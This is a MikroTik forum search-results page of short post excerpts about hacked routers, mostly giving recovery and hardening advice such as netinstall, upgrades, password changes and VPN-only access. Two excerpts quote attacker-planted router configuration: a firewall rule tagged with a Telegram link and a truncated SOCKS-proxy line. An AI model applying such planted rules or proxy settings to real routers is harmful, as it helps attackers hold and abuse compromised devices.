I have a crs 326 24g 2s. When I went to hard reset, it is not working. So I opened my crs board to hard reset with a metal object but I can't find it on the board of crs 326. Please help me ..{ crs 326 hacked yesterday and in hacked script wrote silent reset }
Thank you ALL

by anav
Wed Jun 12, 2019 11:23 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we don't know what firmware he had to begin with so it's an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to download a clean copy of the latest firmware and apply it via netinstall!! As to ...
by craigreilly
Wed Jun 12, 2019 8:37 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

change the username too...
by krafg
Wed Jun 12, 2019 7:42 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

Update your ROS to latest version and change admin password.

Regards.
by lscjablonec
Mon Jun 10, 2019 1:43 pm
Forum: Beginner Basics
Topic: Block IP adress trying to access RDP
Replies: 10
Views: 2558

Re: Block IP adress trying to access RDP

Think about VPN and not limiting ....... From Outside direct available Services will be Hacked in some case Look at winbox hack Look to ubnt Look where you want, direct exposed Services are an invitation the only way to do Secure this, is using a VPN I am using VPN ...
by darkuek
Mon Jun 10, 2019 12:39 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Hacked recently [SOLVED]

Hello, some of my accounts got hacked i start enabling 2FA. i wonder if my Forwarding played a role and if the hacker could access my router and bridge settings and edit/add rules.
Ports 0-65535 TCP and UDP

Best regards.
by mistry7
Sat Jun 08, 2019 5:25 am
Forum: Beginner Basics
Topic: Block IP adress trying to access RDP
Replies: 10
Views: 2558

Re: Block IP adress trying to access RDP

Think about VPN and not limiting .......
From Outside direct available Services will be Hacked in some case

Look at winbox hack
Look to ubnt
Look where you want, direct exposed Services are an invitation
the only way to do Secure this, is using a VPN
by Jotne
Mon Jun 03, 2019 11:50 pm
Forum: General
Topic: Webfig remote access from WAN
Replies: 18
Views: 14418

Re: Webfig remote access from WAN

... link directly to your router (preferably VPN)? It will know everything going on at your site, copy of configuration ++ What happens if Cloutik gets hacked? Could someone get in to all routers Cloutik handles? Link to company https://www.cloutik.com/
by AlainCasault
Tue May 28, 2019 6:12 pm
Forum: General
Topic: How to create group of address lists?
Replies: 7
Views: 3402

Re: How to create group of address lists?

I like your plan. a. there are no hackers in france and germany (FACT) b. there are no computers in france and germany that can be hacked and controlled by Bots (FACT) c. allowing access to winbox by external IPs is very safe (FACT). FACT Foundation for the Advancement of Cardiac Therapies, ...
by anav
Tue May 28, 2019 5:31 pm
Forum: General
Topic: How to create group of address lists?
Replies: 7
Views: 3402

Re: How to create group of address lists?

I like your plan. a. there are no hackers in france and germany (FACT) b. there are no computers in france and germany that can be hacked and controlled by Bots (FACT) c. allowing access to winbox by external IPs is very safe (FACT). FACT Foundation for the Advancement of Cardiac Therapies, ...
by Kindis
Fri May 24, 2019 2:36 pm
Forum: General
Topic: cpu 100% internet disconnections
Replies: 3
Views: 694

Re: cpu 100% internet disconnections

... and upgrade to 6.43.16 If the issue still continues I would export config, read though so there is nothing strange in the config (you have been hacked or so on), netinstall the device and import clean config. If the issue still persists then you might need to dig deeper into it. I think it will ...
by anthonws
Mon May 13, 2019 1:19 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 143
Views: 46042

Re: [Feature request] Wireguard

... miserable because they can now run new-gen VPNs... After a while a new feeling hit them! They are now missing their dearly PPTP and OpenVPN (not a hacked version from Ubiquiti of course!)... They even started a PPTP + OpenVPN movement! "Make PPTP & OpenVPN Great Again!" /S
by helmonder
Tue May 07, 2019 7:19 pm
Forum: General
Topic: RB2011UiAS-2HnD-IN replacement
Replies: 6
Views: 883

RB2011UiAS-2HnD-IN replacement

... years I have set it up with queueing, incoming and outgoing VPN, I am routing my IPTV through it in a separate VLAN, etc. etc. Basically I have hacked this thing to fit as a glove. I am now looking for a replacement system that will not only give me 2.4Ghz but also 5Ghz and also includes an ...
by pe1chl
Tue May 07, 2019 5:32 pm
Forum: General
Topic: device unreachable
Replies: 1
Views: 376

Re: device unreachable

You sure dare to run old software... maybe without firewall too? So it has been hacked now?
What happens after powercycle? I presume it immediately is unreachable?
Unfortunately with MikroTik (contrary to some other manufacturer) there is no "remote reset button" on the power inserter...
by vlad2606
Sat Apr 20, 2019 1:39 pm
Forum: Beginner Basics
Topic: no ping from lan to wan and router to wan
Replies: 2
Views: 469

no ping from lan to wan and router to wan

... from lan to wan and from router itself to wan. Internet is working ok. Ping from lan to bridge is ok. Could it be the result of the router being hacked so i remove all the changes than upgraded the firmware? What to do now ? use netinstall and clean all memory and make all setting once again?
by Poshatskiy
Fri Apr 19, 2019 9:01 am
Forum: General
Topic: RB952 has been hacked
Replies: 0
Views: 360

RB952 has been hacked

Hi there! Yesterday one of my routers has been hacked during initial tuning process. Now I'm aware of the mistakes of tuning process while being connected to the Web. So do not throw stone at me, please. Any advice will be welcome and appreciated. ...
by Jotne
Thu Apr 18, 2019 10:14 am
Forum: General
Topic: Attack on the router?
Replies: 1
Views: 534

Re: Attack on the router?

Have you ever opened for administration (using Winbox) from the internet?
If so it may be that you have been hacked.
Do a net install with latest fixed ros, and do a search for how to secure remote admin.
Example, use VPN etc.
by radionerd
Sun Apr 14, 2019 12:50 am
Forum: General
Topic: [Question] My backup size is 3626.6 KiB ! isn't huge ?
Replies: 23
Views: 5083

Re: [Question] My backup size is 3626.6 KiB ! isn't huge ?

Old thread, same question. My concentrator (RB1100AHx2) was hacked about 6 months ago. It was performing DDoS attacks on Federal IP's ;-( I am 600 Miles away from it. I was able to remotely regain control and get it updated six months ago. Now on 6.44.2, ...
by Paternot
Tue Apr 09, 2019 2:39 pm
Forum: General
Topic: Can't backup
Replies: 9
Views: 1255

Re: Can't backup

1) Take a backup. Just because. ... and then junk it. If the device was hacked, this backup should never ever be restored by any chance. If device was not hacked ... you'll have it up and running with revised configuration anyways. Never underestimate Murphy's ...
by mkx
Tue Apr 09, 2019 9:23 am
Forum: General
Topic: Can't backup
Replies: 9
Views: 1255

Re: Can't backup

1) Take a backup. Just because.
... and then junk it. If the device was hacked, this backup should never ever be restored by any chance. If device was not hacked ... you'll have it up and running with revised configuration anyways.
by ElTRiC
Tue Apr 02, 2019 7:11 pm
Forum: Beginner Basics
Topic: Force local IP to use specific wan on load balancing
Replies: 15
Views: 2437

Re: Force local IP to use specific wan on load balancing

... mikrotik I fear to spend a lot of time and break other rules which are finally working now. Ofc I'm monitoring my router closely, it was already hacked within a day when I started to set it up without password :shock:
by enzain
Fri Mar 29, 2019 11:25 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Any news?
I have some variables on CHR 6.44.1
by anav
Wed Mar 27, 2019 5:32 pm
Forum: General
Topic: Port forwarding to two pcs for RDP
Replies: 12
Views: 2960

Re: Port forwarding to two pcs for RDP

... are allowed access you can add a source address list to the NAT rules and then those ports would not be visible on scans. Regardless RDP is a much hacked service and it would be far better to have those folks VPN into your router and then RDP to the server. Example B. Here, I assume that you want ...
by Kindis
Fri Mar 22, 2019 9:10 am
Forum: General
Topic: Cloud Backup
Replies: 21
Views: 6322

Re: Cloud Backup

... that then send the backup offsite. The reason is that the ISP I have thinks the backup generated e-mail were a sign that my SMTP account had been hacked and changed the password all the time. Here are both scripts. I wish I could say that I'm smart enough to take credit for these but I'm not :-) ...
by 2frogs
Fri Mar 22, 2019 6:30 am
Forum: Beginner Basics
Topic: Can't connect to web interface internal
Replies: 10
Views: 3873

Re: Can't connect to web interface internal

... http://t.me/router_os" dst-port=\ 8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip This indicates your router has been hacked! I would recommend doing a netinstall to remove all bad configs, upgrade to latest ROS, do not reuse old passwords and make sure you have a secure ...
by anav
Fri Mar 22, 2019 2:38 am
Forum: General
Topic: Attempt of attacks through Remote Desktop [SOLVED]
Replies: 6
Views: 1563

Re: Attempt of attacks through Remote Desktop [SOLVED]

... Then log in with that. Patches were released in May 2018. Since then, I've left a test VM exposed to the internet and so far it hasn't been hacked. But due to the disappointing track record, I would NOT trust RDP. Some Options: - Port Knock. Set a firewall rule that when you try to connect ...
by Van9018
Fri Mar 22, 2019 1:37 am
Forum: General
Topic: Attempt of attacks through Remote Desktop [SOLVED]
Replies: 6
Views: 1563

Re: Attempt of attacks through Remote Desktop [SOLVED]

... Then log in with that. Patches were released in May 2018. Since then, I've left a test VM exposed to the internet and so far it hasn't been hacked. But due to the disappointing track record, I would NOT trust RDP. Some Options: - Port Knock. Set a firewall rule that when you try to connect ...
by plisken
Mon Mar 18, 2019 11:28 pm
Forum: Scripting
Topic: Solved Script to recreate the load balance mangle rules
Replies: 12
Views: 19832

Re: Solved Script to recreate the load balance mangle rules

... This is what I mean. If I send a supout.rif to Mikrotik they are very vague and give no concrete solution. What do you mean with my account hacked. My Mikrotik account or forum account? Greetings
by anav
Sat Mar 09, 2019 8:26 pm
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

Hahaha Not quite right, change it to this.......... and bend to my will!!
"Many many RouterOs have been hacked due to weaknesses in older RouterOS software, that were exploited when admins failed to configure their routers in a secure manner.
by anav
Sat Mar 09, 2019 2:35 pm
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

... signature on how to use Splunk with Mikrotik RouterOS 6. Do think once again if you really need the Winbox port open Many many RouterOs has been hacked due to weakness in the RouterOS software. Hi Sob, sorry mate, I call it as I see it. I am no politician, it's the same person that will come back ...
by Jotne
Sat Mar 09, 2019 8:40 am
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

... signature on how to use Splunk with Mikrotik RouterOS 6. Do think once again if you really need the Winbox port open Many many RouterOs has been hacked due to weakness in older RouterOS software.
by cypriotxx
Wed Mar 06, 2019 4:52 pm
Forum: General
Topic: creating 3 isolated network for VM machines
Replies: 5
Views: 477

creating 3 isolated network for VM machines

... to use this router to run 3 different VMachine running web servers on my network that will have no access to my local network even if they are got hacked etc whats the best way forward to achieve something like this please ?
by MasterJames
Tue Mar 05, 2019 10:41 am
Forum: General
Topic: DHCPv6 Prefix Request Response not happening. How to Trace Debug?
Replies: 9
Views: 1435

DHCPv6 Prefix Request Response not happening. How to Trace Debug?

... from the Provider, with their (telus) modem set to bypass directly all control to this MikroTik router. [It's been working great although it was hacked last year with the Socks turned out and Proxy mode enabled the warning of that was NetFlix was blocked.] So I could easily do all the settings ...
by anav
Sun Mar 03, 2019 11:52 pm
Forum: General
Topic: RouterOS making unaccounted outbound winbox connections [SOLVED]
Replies: 65
Views: 61978

Re: RouterOS making unaccounted outbound winbox connections [SOLVED]

... You cannot remove this sheite by simple means. Stop, don't check anything, don't waste your time........... The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.
by anav
Thu Feb 28, 2019 10:10 pm
Forum: Beginner Basics
Topic: allow wifi only local network
Replies: 5
Views: 962

Re: allow wifi only local network

... practices have a global effect that is positive. For example in both cases the wifi connections cannot get to the net and less likely to be hacked in that way. However the wifi devices through USB or their own cellular email connections or browsing can still get infected and in my scenario ...
by anav
Thu Feb 28, 2019 2:57 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

If you cannot use netinstall then there are no guarantees for a hacked unit, regardless of what half measures you take.
by a575606
Wed Feb 27, 2019 9:25 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 377
Views: 98786

Re: RB4011

... admin user is disabled and I'm logged in using a new custom user with admin privileges. It always points to my lan ip, so it's not like I'm being hacked... At first I thought I have a setting wrong, or that a browser plugin was interfering. But I switched to winbox and notice it happened again. ...
by jacinto
Wed Feb 27, 2019 7:35 pm
Forum: General
Topic: Problem RB1100AHx4
Replies: 1
Views: 393

Problem RB1100AHx4

I can not reset the RB1100AHx4 factory. It has been hacked and I want to format it to get the settings right again
by anav
Tue Feb 26, 2019 2:47 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... you mean by updated................. if one simply updated to the latest firmware via a standard update then the router is still most likely in a hacked state. As per clear instruction one should use netinstall for a completely clean restart (and not use any backup files either that may be contaminated).
by Kurosudo
Tue Feb 26, 2019 2:34 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

I found this "malware" too in one of my customers RB. Routerboard was updated and management ports was blocked to internet. But they had hacked CCTV system.
by WildWest
Sat Feb 23, 2019 1:02 am
Forum: General
Topic: Why Mikrotik does not encrypt the password in RouterOS?
Replies: 1
Views: 813

Why Mikrotik does not encrypt the password in RouterOS?

As you remember in 2018 a lot of Mikrotik's were hacked using vulnerability through the Winbox and port 80. Since v6.42.1 (stable) MikroTik had closed that vulnerability. But what I did, I think other people had found it as well: For example, in ...
by anav
Fri Feb 22, 2019 5:14 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 10337

Re: Security issue when Winbox exposed

... are inspired to include cyber defense in their protocols and processes. Each code block should have passed some level of scrutiny, can this be hacked, how can it be hacked how do we prevent it, etc..... I am much more interested in the improvement process in response to such events. :-)
by pe1chl
Fri Feb 22, 2019 10:49 am
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... was open to API, telnet, winbox etc from the internet. That presumably was the case. Or there was some system on your local network that was hacked and from there connections to your router were possible. If not one of those, the step of picking a password is not reached.
by mozerd
Thu Feb 21, 2019 6:10 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... trained techs that are very good in copy paste procedure without understanding the implications in any way.--- It's no wonder that so many get hacked.
by vecernik87
Thu Feb 21, 2019 12:06 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

There was a version 6.42.5
vs
It is confirmed that this was another case of hacked router due to an insecure firewall configuration in combination with old RouterOS version


these two statements seems mutually exclusive.. how is that possible?
by strods
Thu Feb 21, 2019 8:25 am
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

It is confirmed that this was another case of hacked router due to an insecure firewall configuration in combination with old RouterOS version (one which is vulnerable due to a Winbox related problem):

https://blog.mikrotik.com/security/winb ... ility.html
by gutekpl
Wed Feb 20, 2019 7:19 pm
Forum: General
Topic: Three vlans at home on MT hap ac2 - best practice?
Replies: 20
Views: 2128

Three vlans at home on MT hap ac2 - best practice?

... of them already and will multiply that amount shortly. Security on those things is as it is, I don't want to wake up one day and notice that someone hacked my light switch and accessed whole network via SMB and deleted half of that stuff, etc. It could have been probably filtered in Firewall somehow, ...
by joegoldman
Sat Feb 16, 2019 5:10 am
Forum: General
Topic: mikrotik wrong username or password
Replies: 5
Views: 2095

Re: mikrotik wrong username or password

Was it old RouterOS version? If so it's likely been hacked. Good news is, being old version you can use the same hack to re-gain access - but once it's been compromised you should take config export, make sure no bad config is in there, and do a fresh net-install.
by mkx
Thu Feb 14, 2019 10:22 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... it's that your data is on the cloud and if hacked then folks may be able to reach your equipment through the net ... You're making a very important point here. And it's not only control over your gadgets, equally important is your data stored ...
by anav
Thu Feb 14, 2019 9:08 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... It's not the companies themselves that concern me, (besides the disgruntled employee syndrome) it's that your data is on the cloud and if hacked then folks may be able to reach your equipment through the net and with that reach and access, they are apt to branch out........ If on a VLAN ...
by mkx
Thu Feb 14, 2019 7:51 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... and the plain white ones their own VLAN? Or should I group them to VLANs according to rooms? Do I put switches to separate VLAN so if they get hacked light bulbs won't switch on and off as some Nigerian guy sees fit? Sorry, couldn't help myself ...
by anav
Thu Feb 14, 2019 7:27 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... my door status (locked or unlocked) or associated live video feed. My switch was a $xxx dollar investment, I don't want a box for whatever reason hacked to be able to access my switch and EFF IT UP. I think you get my drift!!!! (privacy of information, protection of hardware etc etc) What are ...
by BartoszP
Thu Feb 14, 2019 2:02 pm
Forum: General
Topic: Guide to (possibly) hack RouterOS ... If yes please protect it
Replies: 10
Views: 3231

Re: Guide to (possibly) hack RouterOS ... If yes please protect it

Most users who start threads "Mikrotik hacked...", "My router is unsecured", "Big hole in security of ..." seems to not check forum for security topics Did you try easiest method to look for security problems: https://forum.mikrotik.com/search.php?keywords=vulnerability ...
by Redmor
Mon Feb 11, 2019 10:44 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

Re: ROS v6.43.x Hacked using same old vulnerability

Destroy RB and buy a new one.
by R1CH
Mon Feb 11, 2019 1:05 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

Re: ROS v6.43.x Hacked using same old vulnerability

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
by hsabrey
Mon Feb 11, 2019 12:46 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

ROS v6.43.x Hacked using same old vulnerability

Hello, today I found my RB2011 been compromised using the same vulnerability and here is the photo attached. This time they fetch a file from the internet which i do not what it is? Mean time the version is v6.43.7, the script added a file in the mikrotik and this is its content /ip socks access add src...
by nichky
Sat Feb 09, 2019 6:42 am
Forum: General
Topic: l2tp/ipsec problem
Replies: 5
Views: 1097

Re: l2tp/ipsec problem

... certificates? It's just a message. That features comes with the new version several versions ago. Just reminding you that pre shared key can be hacked. Thank you
by mkx
Fri Feb 08, 2019 10:00 pm
Forum: Beginner Basics
Topic: Out of Box settings on RB2011
Replies: 2
Views: 458

Re: Out of Box settings on RB2011

... or newer) and you see around 10 firewall filter rules (as opposed to none), then you're quite fine to go online. Assuming that the device wasn't hacked before and that you didn't disable or reorder firewall rules ...
by anav
Tue Feb 05, 2019 3:27 pm
Forum: General
Topic: MOAB mother of all blacklists
Replies: 88
Views: 15743

Re: MOAB mother of all blacklists

... makes them happy? He is merely offering a service that he ALREADY provides for his clients doing what he thinks is best to keep them from getting hacked. He doesn't need anybody from this forum to use the service. If you think $60 bucks a year is too much, then don't use it. I spend more money ...
by mkx
Mon Jan 28, 2019 9:08 am
Forum: General
Topic: IP Socks causes 100%cpu
Replies: 2
Views: 819

Re: IP Socks causes 100%cpu

I'm afraid that only sure way to clean malware from hacked routerboard is to perform netinstall ... for that physical access is a must. And, after you do it, don't restore configuration from backup, malware might be hidden in it. Rather re-do configuration ...
by tiji2012
Sun Jan 27, 2019 2:44 am
Forum: General
Topic: crs3xxx impossible to reset.
Replies: 0
Views: 383

crs3xxx impossible to reset.

Hello everyone, my name is Matias and I'm from Argentina, so apologies for my grammar. I just got a problem with my Crs368, it got hacked and blocked totally, I can't get in with SwOS or RouterOS. I tried with NetInstall, but the crs3xxx version doesn't have NPK archives, just BIN archives, ...
by Redmor
Wed Jan 23, 2019 5:27 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

1) I ALWAYS said that this hacked RB, even if behind dst-nat, has got the firewall that I've posted, so it isn't opened to the internet, access is restricted. 2) I don't use default username admin 3) I don't use backup files or exports ...
by anav
Wed Jan 23, 2019 4:52 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... major problems with many of the MT reported hacks. If the admin does not secure access to the router internally and a device behind the router is hacked due to phishing, going to unsafe sites etc, then the router could be vulnerable from the inside but I am not sure how that happens. There are ...
by Redmor
Wed Jan 23, 2019 3:39 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... 1) I set the firewall on the public interface 2) The device has got the firewall I've posted, even if it's behind NAT. 3) I've found other RBs hacked, after removing all unusual config and updated they have been hacked again. In all cases, I have this firewall, it's very similar to defconf ...
by normis
Wed Jan 23, 2019 8:27 am
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

1) Defconf protects only the public interface.
2) Defconf doesn't protect device from within. If you were hacked a year ago, cleared the config but left one script in the device, it could have reconfigured itself even after you installed a better firewall and upgraded.
by Redmor
Tue Jan 22, 2019 9:48 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Anav ... should mrz explain again and again and step by step what to do when you are hacked or could expect that author is aware of https://blog.mikrotik.com/ "Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable" ...
by Redmor
Tue Jan 22, 2019 9:43 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the router and changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials were not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by Redmor
Tue Jan 22, 2019 9:41 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave Winbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by anav
Tue Jan 22, 2019 5:26 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Concur Bartoz, of course the OP should have his ....... ......... whacked for not using netinstall after being hacked in the past. This has been documented on almost every thread on the subject and in the blog and and and and and............................ ...
by mrz
Tue Jan 22, 2019 5:25 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the router and changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials were not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by BartoszP
Tue Jan 22, 2019 5:06 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Anav ... should mrz explain again and again and step by step what to do when you are hacked or could expect that author is aware of https://blog.mikrotik.com/
by anav
Tue Jan 22, 2019 5:04 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave Winbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by anav
Tue Jan 22, 2019 5:00 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the router and changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials were not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by mrz
Tue Jan 22, 2019 4:03 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Currently there are no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the router and changed login credentials, then contact support.
There are cases that routers get "hacked" even after upgrade, because already stolen credentials were not changed.
by Redmor
Tue Jan 22, 2019 3:37 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave Winbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by Redmor
Tue Jan 22, 2019 3:31 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... the RB hasn't got a public IP, plus it has a firewall that should drop everything and accept only 8291 connections from address list. How can I be hacked? For God's sake, one port opened, with firewall, it's obviously a vulnerability. Router has been hacked using a vulnerability before 6.43.8, ...
by anav
Tue Jan 22, 2019 2:34 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave Winbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall??
by Arcee
Tue Jan 22, 2019 2:15 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

You should really rename this thread to "I have been hacked" and try to figure out what you did wrong in the configuration.

Why have winbox open to the world?

by eddieb
Tue Jan 22, 2019 2:08 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

Perhaps you should not use the word vulnerability until it is confirmed ...
Until now you can only name it "hacked" ...
And the reason for that is not clear

ps,
send email to support@mikrotik.com for help, this is a user forum, not a support forum
by mkx
Sun Jan 20, 2019 7:10 pm
Forum: General
Topic: Unable to reach a hand full of web sites...
Replies: 2
Views: 458

Re: Unable to reach a hand full of web sites...

Depending on ROS version and original FW config it is quite possible that your router got hacked. Export current config to text file (/export file=config.txt), save that file to your computer. Then netinstall the router (google for exact procedure) and start configuring ...